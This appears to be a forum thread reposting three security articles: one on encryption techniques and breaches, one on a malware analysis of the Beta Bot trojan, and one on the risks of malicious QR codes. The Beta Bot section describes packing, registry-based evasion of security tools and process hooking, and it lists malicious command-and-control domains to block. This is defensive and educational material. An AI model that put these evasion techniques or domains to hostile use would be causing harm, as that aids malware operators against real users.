occurred in 2006 with a group of hackers taking advantage of a weak data encryption system at TJX Companies Inc. Poor security on the company’s wireless networks had resulted in massive data theft, and 94 million credit cards were exposed. Another instance that shows the human element being the weakest link in the security chain is the case of the U.S. Department of Veterans Affairs’ unencrypted national database theft. Names, social security numbers and other sensible information were found on a laptop and external hard drive that were both stolen. This episode, also in 2006, affected some 26.5 million veterans, whose personal data was taken in a burglary from a VA analyst’s Maryland home. A more recent event involved Sony’s PlayStation Network that had 12 million unencrypted credit card numbers hacked. In 2012, a NASA laptop was stolen; it contained records of sensitive personal identifiable information of employees and contractors. Lately, news has reported of an unencrypted, password-protected laptop that was stolen at the Community Technology Alliance containing social security numbers and names of 1,177 people. Another device containing data for 2,800 patients was stolen from Northwestern Memorial Health Care. Encryption Solutions As the need for encryption is clear to attempt ensuring the integrity and confidentiality of data, the first decision security professionals need to make is between software-based or hardware-based encryption. Both have pros and cons to be considered and can definitely be applied in a combination of ways to ensure maximum protection according to the users’ needs. Software-based encryption can be extended to all data, devices, and users in an organization. It works well to secure e-mails, instant messaging, data in transit and web sites. These solutions are normally cheaper and easy to customize and update. Common drawbacks are performance degradation and vulnerabilities linked to those of the operating systems in which they operate. Risks are linked also to the ease of being turned off by users. Hardware-based solutions are specific to the device they protect. Full drive encryption (FDE) or solutions like self-encrypted drives (SEDs) are an effective approach that simplifies the deployment of security for data at rest and makes it easier for organizations to manage security of data when stored. The advantage of hardware-based solutions is that they bypass many of the typical drawbacks of software-based solutions like performance degradation or vulnerability to attacks aimed at the encryption key stored in memory. Being encryption available at drive-level, this hardware solution also is perfectly independent by any software or operating system used, and usually cannot be turned off by users. Drawbacks are obvious. Hardware solutions are specific to the devices they protect, and updates can normally be performed only by substituting the device. The Encryption Process & Protecting Data Today One of the basic concepts of encryption is the need for keys to encrypt and decrypt the message. The process of encryption is done with two individual keys – a private key and a public key; this is referred to as asymmetric encryption, while symmetric encryption requires using one key for both steps. Encryption simply acts as a form of digital lock that prevents unauthorized users from accessing data. In addition, by adding a signature with a private key, a person can prove his or her own identity and make tampering with the message more difficult. Just like sensitive messages, the key must also be adequately protected, secured and kept hidden from unauthorized users. A number of encryption methods can be employed to secure data especially when in transit, since that is when they are more vulnerable. The content can be intercepted through some effort of wiretapping or eavesdropping by an intruder. In link-to-link encryption, for example, the message is decrypted at each host as it travels so it is vulnerable if any of the hosts is not secure. This method works well within an organization, for internal use, where all communication nodes security is well known, but might not be the safest method when the message is out in the open. Lately, much attention has been given to end-to-end encryption. This system allows safety of data by ensuring that only the people that are communicating are able to read the message. No one except the sender and the receiver is able to decrypt the message (not even the Internet provider) which is passed from host to host still encrypted. A renowned German e-mail provider, for example, has implemented the use of this methodology for all its users in an attempt to secure their communication from eavesdropping and intrusion. As securing information in a datacenter that requires protection for a multi-vendor infrastructure or the cloud is becoming a widespread need, new solutions and techniques had to be developed to render the transmission of data more secure. In most cases, solutions are needed to be deployed simultaneously on network shares, file services, application and web servers as well as database servers. Techniques like tokenization have been deployed to make sure that data exchanged from different servers and sent to onsite, cloud and mobile end users are still safely handled. In the case of tokenization, for example, data are safely stored and replaced by tokens that are used within an organization to process the information, trigger action and perform tasks. The data never leave their safe storage place and cannot be compromised even if the token is intercepted. This method is extremely helpful when dealing with credit card numbers and financial info in general. Honey encryption, instead, is a technique that can provide additional security when passwords are used as keys. This is particularly effective against conventional brute-force attacks. The concept is simple; in normal circumstances, when intruders intercept a message and attempt to guess the key that encrypts it, all they can get is a manifestly non-usable response. The result is that the malicious hacker continues to attempt until successful. Honey encryption, devised by Juels and Ristenpart, produces a ciphertext that when decrypted with a number of wrong keys gives a “honey message”, a fake plaintext that satisfies the attacker but does not relinquish any real data. Although effective, honey encryption, obviously, is not helpful when the attacker already has a few of the puzzle pieces (for example the public key associated with the private key) and therefore is useless in the protection of HTTPS certificate keys. The method is, however, effective when protecting, for example, password vaults, collections of passwords protected by one master key. An interesting technique for the handling of sensitive data in a cloud environment has been designed by Craig Gentry, a researcher from IBM: Homomorphic encryption. This form of encryption allows users to store data in a cloud encrypted while still being able to analyze and mine data. In fact, computations can be performed on the encrypted data in the cloud server, and only the results are decrypted by the end user. This can be used for any data, including, for example, entire collections of e-mails and messages that could be securely worked on without exposing the messages contained within. Although homomorphic encryption has been explored for 30 years, it is thanks to the work of Gentry (since 2008) that finally the system is being perfected and getting close to having practical applications. Although still too slow and requiring a larger-than-practical number of computations, this type of encryption could soon be applied. DNA Cryptography is another method being explored; it can be defined as hiding data as a DNA Sequence. This technique is based on DNA computing designed by the work of Leonard Max Adleman (the A in RSA) beginning in the year 1994. This modus operandi is still in the initial phases of development, but results are promising. One more is for Quantum Cryptographic tasks and, in particular, QKD (Quantum Key Distribution). Secure communication is ensured by a random key shared by sender and receiver. The advantage of this method is that, as for all quantum systems, a third party that enters it creates a disturbance that can be noted by the sender and receiver. An eavesdropper would cause the communication to be aborted, as the key would not be shared. Conclusion According to data collected by BreachLevelIndex, more than 2 million records per day were breached in the year 2014. It is clear that more and more attention needs to be given to the security of data both at rest and in transit. Coupled with users’ access control, encryption is an effective means of securing sensitive information. Multiple techniques of cryptography are important to ensure data integrity in the three components of the CIA (Confidentiality, Integrity, Availability). Encryption is not just for companies and organizations. Individual users also should consider protecting their own data. With mobile devices now allowing users’ access to all their sensitive information (personal, financial, even medical) and with the growing use of cloud solutions, it is paramount that encryption is adopted and new techniques developed. Currently, many encryption products are available on the market, some are free, and can suit everyone’s needs. With today’s encryption technologies constantly being developed to deliver enhanced security across a range of channels for private communication and storage, there is no reason why this protective measure should not be applied to safeguard data from hackers who continue to develop sophisticated techniques in the attempt to steal information. Whatever the data are and wherever they reside, they ought to be safeguarded: password protected and encrypted. Business data needs to be safe and placed in a secure environment. Failure to apply authentication and end-to-end encryption for limited access to data could lead to possible exposure by intruders. Whatever protection may be necessary depends on the assets that are being protected. Often, businesses requirements and regulatory considerations will dictate what approach is best. Users need to analyze their needs and apply the right products to prevent unauthorized access to information and opt to utilize software and hardware technologies to facilitate the encryption of computer, mobile devices and media. References Allen, L. (2012, August 3). Securing Data on a Moving Target: Self-Encrypting Drives Deliver Top Security, Performance and Manageability. Retrieved from Securing Data on a Moving Target: Self-Encrypting Drives Deliver Top Security, Performance and Manageability | StorageReview.com - Storage Reviews Juels, A. (2014, January 29). Honey Encryption: Security Beyond the Brute-force Bound. Retrieved from http://pages.cs.wisc.edu/~rist/papers/HoneyEncryptionpre.pdf Naone, E. (2011, May/June). Homomorphic Encryption – Making cloud computing more secure. Retrieved from Homomorphic Encryption - MIT Technology Review Olzak, T. (2010, May 7). Choose Encryption Wisely. Retrieved from What is Encryption and When Should You Use it to Protect Data and Computers Paganini, P. (2015, February 20). The Future of Data Security: DNA Cryptography and Cryptosystems. Retrieved from The Future of Data Security: DNA CryptographySecurity Affairs Schneier, B. (2010, June 30). Data at Rest vs. Data in Motion. Retrieved from https://www.schneier.com/blog/archives/2010/06/data_at_rest_vs.html Simonite, T. (2014, January 29). “Honey Encryption” Will Bamboozle Attackers with Fake Secrets. Retrieved from http://www.technologyreview.com/news/523746/honey-encryption-will-bamboozle-attackers-with-fake-secrets/ Source
  24. Aerosol
    In this article, I would like to show how an analysis is performed on the Beta Bot trojan to identify its characteristics. The Beta Bot trojan, classified as Troj/Neurevt-A, is a dangerous trojan. This trojan is transferred to the victim machine through a phishing email, and the user downloads the files disguised as a legitimate program. This malicious file, when executed, drops a file in the victim machine, then changes system and browser behaviors and also generates HTTP POST traffic to some malicious domains. Beta Bot has various capabilities, including disabling AV, preventing access to security websites, and changing the settings of the browser. This trojan was initially released as an HTTP bot, and was later enhanced with a wide variety of capabilities, including backdoor functionality. The bot injects itself into almost all user processes to take over the whole system. It also utilizes a mechanism to make use of Windows messages and the registry to coordinate the injected codes. The bot also communicates with its C&C server through HTTP requests. The Beta Bot trojan spreads through USB drives, the messaging platform Skype and phishing emails. Analysis Walkthrough Now let’s see how we can do a detailed analysis on the Beta Bot trojan. First step is to isolate the infected system and analyze the system to find any suspicious files. Upon analysis, we found a suspicious file, crt.exe. The crt.exe file was then uploaded into our automated malware analysis system for deeper analysis and it was able to find malicious traffic to several malicious domains. (DNS request to malicious domains) A list of file manipulations was revealed during automated malware analysis. A malicious file named ‘wfwhhydlr.exe’ that was dropped by Beta Bot was revealed during this analysis. (File creation and modification) Mutexes that were used by the malware were also found during the automated analysis. (Mutex list of Beta Bot Trojan) After that, the analysis was carried out on our dedicated malware analysis machine. This machine consists of all the core tools needed to carry out both the static and dynamic analysis. As the first step of manual analysis, static analysis was carried out to find the time stamp of the malware. We were able to find the compile date of the malware sample. The malware was compiled on March 14th, 2013, and a GUI is also associated with this sample. File properties of the Beta Bot trojan) Later, static malware analysis was carried out, and as a first step the malware was checked to find whether it was packed or not. On analysis we found that the malware was packed with UPX packer. (Packer detection of the malware) A manual unpacking process was carried out to unpack the packer using a user mode debugger. Then we dumped the unpacked malware, and Import Address Table was reconstructed. (Debugger view of the malware before UPX unpacking) After the IAT reconstruction, the malware was analyzed using the debugger and found that there is no data available and the all the strings are functions are obfuscated. Thus it has to be suspected that the malware was multipacked, and we found that it was packed with a sophisticated crypter called VBCrypter. Then we came to a conclusion that this Beta Bot malware was multi-packed with a combination of UPX packer and VBCrypt crypter. VBCrypter is written in Visual Basic and it is more sophisticated that usual packers. During the execution of the packed malware, it creates the unpacked code as a child process itself and executes that code in the memory. Thus this type of packed malware will be very difficult to unpack. Crypter detection of the malware) Then a process of steps was carried out in order to decrypt the malware encrypted with VBCrypt. A user mode debugger was used for this process and by following a series of steps; the malware was decrypted up to an extent and thus the obfuscated code was retrieved for further analysis. Debugger view of the Beta Bot trojan after UPX unpacking) After decrypting the VBCrypt, it showed up with strings and functions that reveal the activity of the malware. The Beta Bot malware tries to find out the Network Interface Card in the infection machine, in order to find out the network adapter device name. The malware also looks for the computer name of the infected machine. (Debugger view of the decrypted Beta Bot trojan) Also using the debugger analysis, it came to an inference that the Beta Bot trojan also has the capability of deactivating the Task Manager of the infected machine. (Debugger view of the malware) The malware was analyzed through a disassembler, and several multi-language strings were retrieved. This reveals the multi-language capability of the Beta Bot trojan. This malware has the ability to configure and behave according to the geo-location of the victim machine. (Disassembler view of the Beta Bot trojan) Dynamic analysis was carried out by executing the malware within our isolated virtual malware lab. On executing the Beta Bot malware was dropped another executable named vuxrwtqas.exe. This file was dropped in the highworker folder under the Program files folder in C drive. (Files dropped by the Beta Bot trojan) Then registry analysis of the Beta Bot trojan was carried out, and on analysis we found that the malware manipulates the Windows registry setting of the infected machine. Registry values are added in order to carry out the debugging of the major security products like MalwareBytes Spybot, Trendmicro Housecall and Hijackthis. This registry setting can used to debug the startup code of the applications and thus the malware can bypass these security applications and thus can execute in the machine. (Registry values added by the Beta Bot trojan) Then packet sniffers were used to study the network behavior of the malware, and we were able to list out several malicious IPs on which the malware were trying to connect. Malicious IPs on which the malware connects) Then the memory analysis of the malware was carried out by executing the malware and taking the dump on the primary memory. On analysis, a large number of trampoline hooks was found. The malware, when executed, hooks almost all the processes in the victim machine and thus takes control of the whole machine. The Beta Bot trojan inserts a trampoline hook on the wuauclt.exe file, and this is a Windows Update AutoUpdate Client which runs as a background process that checks the Microsoft website for updates to the operating system. Thus it can assumed that the malware updates itself or downloads other malicious software by hooking this process. (Trampoline hook by the malware) The Beta Bot trojan, on execution, creates a sub-folder named ‘highworker.{2227A280-3AEA-1069-A2DE- 08002B30309D}’ under %PROGRAM FILES%\ COMMON FILES and creates a file named ‘vuxrwtqas.exe’. The first part of the folder name, ‘highworker’, is obtained from the configuration of the bot. The rest of the strings in the folder name is a special GUID which makes the folder link to the ‘Printers and Faxes’ folder in Windows Explorer, and this folder will act as the initializer when malware restarts. The crt.exe then creates a new file and it exits and this newly created file creates a process of a system application and starts to inject the process. (Folder in which malware is dropped) The dropped file is digitally signed with Texas Instruments Inc., is an American company that designs and makes semiconductors, which it sells to electronics designers and manufacturers globally. Thus we can assume that the file is not genuinely signed. (Metadata of the dropped file) Recommendations Use a firewall to block all incoming connections from the Internet to services that should not be publicly available. By default, you should deny all incoming connections and only allow services you explicitly want to offer to the outside world. Block peer to peer traffic across the organization. Ensure that programs and users of the computer use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, ensure that the program asking for administration-level access is a legitimate application. Turn off and remove unnecessary services. By default, many operating systems install auxiliary services that are not critical. These services are avenues of attack. If they are removed, threats have less avenues of attack. Configure your email server to block or remove email that contains file attachments that are commonly used to spread threats, such as .vbs, .bat, .exe, .pif and .scr files. Isolate compromised computers quickly to prevent threats from spreading further. Perform a forensic analysis and restore the computers using trusted media. Train employees not to open attachments unless they are expecting them. Also, do not execute software that is downloaded from the Internet unless it has been scanned for viruses. Ensure that your Anti-Virus solution is up to date with latest virus definitions. Ensure that your systems are up to date with the latest available patches. Isolate the compromised system immediately if the malware is found to be present. Block traffic to the following domains in your perimeter devices such as Firewalls and IDS/IPS solutions: highroller.pixnet.to sbn.pxnet.to cpstw.santros.ws ccc.santros.ws Eradication The following products can be used to remove the Beta Bot trojan from the infected machine: Symantec Power Eraser Kaspersky’s TDSSKILLER Microsoft’s Malicious Software Removal Tool (MSRT) Malwarebytes Anti-Malware Login through the victim machine in Safe Mode and manually remove the process crt.exe and vuxrwtqas.exe related to the Beta Bot trojan. Manually delete the registry entries associated with the Beta Bot trojan. Delete the malicious file dropped by the malware in the highworker.{2227A280-3AEA-1069-A2DE- 08002B30309D}’ under %PROGRAM FILES%\ COMMON FILES\vuxrwtqas.exe. References Endpoint, Cloud, Mobile & Virtual Security Solutions | Symantec Source
  25. Aerosol
    With the increasing use of smartphones, QR codes are becoming popular. Recently, WhatsApp launched its web version, which needs QR code scanning to access the web version of WhatsApp. So, many people now know what QR code is, but still more are unaware. It is very similar to a bar code we see in products, but it does not need a different reader. Our smartphone camera can easily read it with the help of a QR code scanner app. Due to fast readability, it is now widely accepted. And the use of QR codes is increasing. With the scan of a QR code, we can perform various tasks which would otherwise need a lot more effort. For example, scan a QR code and save the business card details in your smartphone. This is why people like to use QR code scanning for general tasks. But most users are not aware that QR codes can also be malicious. This is why scammers are now using malicious QR codes for tricking users. In this article, I will discuss QR codes in details. I will also try to cover all the potential security issues related to QR codes. QR Codes QR code (or Quick Response code) is a matrix bar code which can be read by an imaging device (camera) and then processed to read its data. It was initially developed for the automotive industry in Japan, but now it is being used by many companies. You will be surprised to know that the QR code was invented back in 1994 by Denso Wave. Nowadays QR codes are being used to display text to users, to save a vCard contact information to the user’s smartphone, to open a website URL, to code payments, for website login (ex: WhatsApp web login) or to compose an e-mail or text message just by scanning a QR code. QR codes are really useful and help us to complete tasks faster in smartphones. You can quickly open a website just by scanning a QR code and you do not need to manually type the URL in your smartphone. This is why many websites’ poster ads now contain QR code. Another popular use is on a business card. Now people also include QR code in their business cards. So, other persons can simply scan the QR code to save the contact details in their smartphone. See the sample QR code below. This is for opening a website. QR code for: IT Security Training & Resources by InfoSec Institute Scanning the above QR code will open IT Security Training & Resources by InfoSec Institute. How to Generate QR Codes There are various tools available for this. If you want to generate a QR code with specific information, you can use these tools, which let you create QR code for URL, text, vCard, SMS, call, geo-location, event, email and login. Different tools have different abilities. A few good QR code generator tools are: https://www.the-qrcode-generator.com/ QR Code Generator – create QR codes for free (Logo, T-Shirt, vCard, EPS) QR Code Generator - Create QR codes here http://www.qrstuff.com/ https://scan.me/qr-code-generator You can use any of the above tools to generate your own QR code. Lifespan of QR codes This is a question about QR code people generally ask. QR code does not need any platform for redirection, but it has data within it. Once a QR code is generated, it can be used anytime, anywhere. The lifespan of the QR codes is unlimited, so you do not need to worry about lifespan. Generate and then use. Can QR codes be hacked? A QR code is the square matrix with small black square dots arrangement. Hacking a QR code means manipulation of the action without modifying the QR code. This is not possible. QR codes can be malicious and can trigger malicious action. But that QR code will not be the same as the legitimate QR code. Two QR codes with different actions will never be the same. You will certainly see different patterns in both QR codes. So, QR codes cannot be hacked. But It can be malicious and hackers can use a QR code for various malicious purposes. And there are various reports in which we have seen the malicious acts. Security Risks Involved with Use of QR Codes As I already discussed, QR codes can be malicious. So, there are various security risks involved with QR codes. In this section, I will discuss all the security risks involved with QR codes. Phishing Phishing is a popular way of hacking web accounts. Attackers send a fake web login page which pretends to be the original login page of the website it’s claiming to be. When an innocent user use this fake page to login, his/her login information is sent to the attacker. And now, his/her password is in the hands of the attacker. Phishing is the main security issue involved with QR codes. It is also described as QRishing by some security researchers. QR codes are generally scanned by a smartphone camera to visit a website. Now, many website ads put QR code along with a URL so users can quickly scan QR code to visit the website. This is where scammers try to trick users. As I already told you, QR codes cannot be hacked. So, hackers or scammers try to change the QR code added in the poster. They can also print the similar kind of fake posters and put in public places. Innocent customers will scan these fake QR codes to visit the websites but they will be redirected to phishing websites. Most people judge a website by its look and feel, and phishing pages look exactly similar to legitimate websites. In mobile devices, it is hard to check the full address in the browsers. Due to limited space, browsers do not show the full address in the URL field. And most people never try to check the full address. This makes users more vulnerable. When they use this phishing page to login, their passwords are compromised. Although this phishing trick has limited scope, it is most effective. There are various case studies which clearly confirm that people generally trust QR codes and become the victim of QRishing at public places. Malicious software distribution Scammers generally use malicious websites to distribute malware via drive by download attack. Nowadays, most of the drive by download attacks are being done against Android users. Drive by download attacks are attacks in which a website forcefully downloads software in your device when you visit the website. It does not need any action from the user’s side. Visiting the website is enough to trigger the download action. Scammers try to install malicious apps and then exploit that device. These infected devices can join an existing botnet or can send SMS to premium numbers. It can also leak your data. By using QR codes to point to this kind of malicious websites, we can easily trick users. Users cannot see the URL, so there is no point of doubt. In QR codes, there is no need to enter the URL manually, users only scan QR code. And they only know what you will write about the QR code. In Russia, a malicious QR code on scanning sent SMS to premium numbers costing $5 USD per SMS. Most of these kinds of attacks have been seen against Android devices. Pointing to potentially harmful websites This is similar to what we learned in the previous point, but it is not about serving malware. Sometimes websites have browser exploits which can do lot more harm. Browser exploits can enable microphone/camera access, access browser data, send emails or join a botnet to perform a DDOS attack on any legit website. All these actions occur in the background, so users never know about this. They will only see a website, but they are being tricked. How to Protect Yourself from Malicious QR Codes Malicious QR codes have limited scope, but may be harmful. So, you need to be protective and always take care of your security while using QR codes. If you are going to use it from banners at public places, you need to be selective. There are few things which you can do to protect yourself from malicious QR codes and its attacks. Observe before use: If you find a QR code in any banner advertisement in a public place, look at it closely. Most of the times, scammers stick their fake QR code above the legitimate QR code in a legitimate poster. So try to see if it is real or not. You can check by touching the poster. If it does not look like it’s actually printed on the poster, do not use it. Follow this guideline for QR codes in public places. Your observation can save you from attacks. If you are not sure, never scan that QR code. Be suspicious and never giver personal or login info: Always be suspicious of the page you land on via QR code. Never share your personal information on these pages. Only do this if the QR code is from a very trusted source and you trust the website. And yes, avoid entering your login information. It may be a phishing page. So for login, always enter the URL manually on the browser’s address bar. Entering login information on the pages you land on via QR code means putting yourself in big trouble. So, why take the risk just to avoid a little extra effort? Open a browser, type the address and login directly on the website. Look at URL before proceeding: A few QR code scanners also show the actual URL before proceeding and ask to confirm whether you want to visit the URL. You can use these QR code scanners to know what URL the QR code will send you. This will help you to know if the QR code is malicious or not. Looking at the QR code does not confirm whether it is malicious or not. So, I recommend use of safe QR code scanners. Norton Snap is a nice QR code scanner app with built-in security features. This app is available for both Android and iOS platforms. You can use this QR code scanner app to prevent any malicious activity in your smartphone. It not only shows the URLs but also checks the URLs within its database of malicious links. If it finds any malicious URLs within the QR code, it will warn you. Conclusion Although QR codes are not new, their use is still very limited. With the increasing use of smartphones, we have seen sudden a rise in the use of QR codes. Now various websites and apps let users use a QR code to login or complete other tasks. But there are still very few users who use QR codes. This is the reason why there is little reporting on malicious QR codes. Nobody wants to waste time on things which have low impact. But this will change very soon. With the launch of WhatsApp for web, now many users know how to use QR codes. So, we can expect another sudden rise in the use of QR codes. And when it is used by a greater number of users, attackers will surely find new ways to exploit its weaknesses. As of now, QR code risks have limited scope, but when there are more users, there will surely become a bigger risk. In the near future, we will also see the use of QR codes for payments and money transfer. At that time, it will be very important to follow security rules. As of now, we only need to use a good and secure QR code scanner app and then relax. Having a good anti-virus and Internet security app is also recommended. This will warn if a website is a phishing website or trying to install a dangerous app in your smartphone. I hope you have found this article interesting. If you use QR code, do not forget to be safe. References http://usa.kaspersky.com/about-us/press-center/press-blog/malicious-qr-codes-attack-methods-techniques-infographic https://www.andrew.cmu.edu/user/nicolasc/publications/Vidas-USEC13.pdf http://en.wikipedia.org/wiki/QR_code Source
×
×
  • Create New...